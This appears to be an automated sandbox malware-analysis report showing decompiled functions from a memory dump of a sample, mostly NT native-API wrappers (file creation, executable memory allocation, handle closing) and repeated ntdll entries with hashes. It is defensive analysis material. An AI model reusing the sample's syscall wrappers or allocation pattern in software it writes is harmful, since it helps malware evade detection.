                                                              Function 004185CA, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004185CA(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t26;
				void* _t40;

				_t20 = _a4;
				_t8 = _t20 + 0xc40; // 0xc40
				E004191D0(_t40, _a4, _t8,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t26 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t26;
			}





                                                              0x004185d3
                                                              0x004185df
                                                              0x004185e7
                                                              0x0041861d
                                                              0x00418621

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: a260aadcb987d9cee48eecc03de88d4e2dfbb459df2947319c2d09d941673ebf
                                                              • Instruction ID: 781c743693272cec8dbddb5504fe6cdad0a0d66e3555684ad5762d013c43aa27
                                                              • Opcode Fuzzy Hash: a260aadcb987d9cee48eecc03de88d4e2dfbb459df2947319c2d09d941673ebf
                                                              • Instruction Fuzzy Hash: 5701B6B2200109AFCB18CF98DC94EEB37A9AF8C354F15824CFA5D97281C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004185D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004185D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191D0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                              0x004185df
                                                              0x004185e7
                                                              0x0041861d
                                                              0x00418621

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041861D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction ID: 94ce09d36334706186cc09884e4a2eaa092baa2fe979bd9646a6b1291086e505
                                                              • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                              • Instruction Fuzzy Hash: B0F0BDB2200208ABCB08CF89DC95EEB77EDAF8C754F158248FA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004187AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004187AA(char __eax, void* __ebx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				long _t15;
				void* _t25;

				 *0x559c091f = __eax;
				_t11 = _a8;
				_t3 = _t11 + 0xc60; // 0xca0
				E004191D0(_t25, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x30);
				_t15 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t15;
			}





                                                              0x004187ac
                                                              0x004187b3
                                                              0x004187bf
                                                              0x004187c7
                                                              0x004187e9
                                                              0x004187ed

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: 1d5b99e4bb5727c6e441349369025abfd660ffe7d9ac402471c5bdedf16ba209
                                                              • Instruction ID: a16daabcf24435bf9481d7545ed8c5cdab1829824d0368d249ee7da9e0bd5a74
                                                              • Opcode Fuzzy Hash: 1d5b99e4bb5727c6e441349369025abfd660ffe7d9ac402471c5bdedf16ba209
                                                              • Instruction Fuzzy Hash: 77F058B2210208AFDB18DF89CC81EEB77ACAF88244F148149FE0997241C630E910CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004187B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004187B0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191D0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                              0x004187bf
                                                              0x004187c7
                                                              0x004187e9
                                                              0x004187ed

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193A4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187E9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction ID: 71e408db6ffae62f38499a7299b3f2ec9839ba1f647d0a7234910b9a40a1f481
                                                              • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                              • Instruction Fuzzy Hash: 07F015B2200208ABDB18DF89CC85EEB77ADAF88754F158149FE0897241C630F810CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004186FA, Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 62%
                                                              			E004186FA(void* __eax, void* __ebx, void* __esi, void* _a4) {
				intOrPtr _v0;
				long _t9;
				void* _t14;
				void* _t16;

				asm("das");
				_t16 = __esi + 1;
				asm("in al, 0x55");
				_t6 = _v0;
				_t2 = _t6 + 0x10; // 0x300
				_push(_t16);
				_t3 = _t6 + 0xc50; // 0x409753
				E004191D0(_t14, _v0, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a4); // executed
				return _t9;
			}







                                                              0x004186fa
                                                              0x004186fb
                                                              0x004186ff
                                                              0x00418703
                                                              0x00418706
                                                              0x00418709
                                                              0x0041870f
                                                              0x00418717
                                                              0x00418725
                                                              0x00418729

                                                              APIs
                                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: e225776d242f37f88025efa195d8bd3b00f1898da5072ae4566523fa419645b3
                                                              • Instruction ID: 0cbfecce765e7b2dca03f1333fb766e73eb6f067820fa0a5ccf26524d66214ac
                                                              • Opcode Fuzzy Hash: e225776d242f37f88025efa195d8bd3b00f1898da5072ae4566523fa419645b3
                                                              • Instruction Fuzzy Hash: DBE08C722002147BD710EF95CC49ED77B69EB44660F054559BA1D9B242C530EA00C6E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00418700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00418700(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191D0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                              0x00418703
                                                              0x00418706
                                                              0x0041870f
                                                              0x00418717
                                                              0x00418725
                                                              0x00418729

                                                              APIs
                                                              • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418725
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction ID: 315d70e0dd0a86a48429d20d502ae4ae3fb499c677b3512a188e9811668946a9
                                                              • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                              • Instruction Fuzzy Hash: 17D01776200218BBE714EB99CC89EE77BACEF48760F154499BA189B242C570FA4086E0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                              • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                              • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                              • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                              • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AB07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                              • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                              • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                              • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                              • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                              • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                              • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                              • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                              • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                              • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                              • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462025900.0000000000BA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462058005.0000000000C00000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AAFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.461925048.0000000000AA0000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                              • Associated: 00000005.00000002.461920842.0000000000A90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462009398.0000000000B80000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462013719.0000000000B90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462017962.0000000000B94000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.462021978.0000000000B97000.00000040.00000001.sdmp Download File
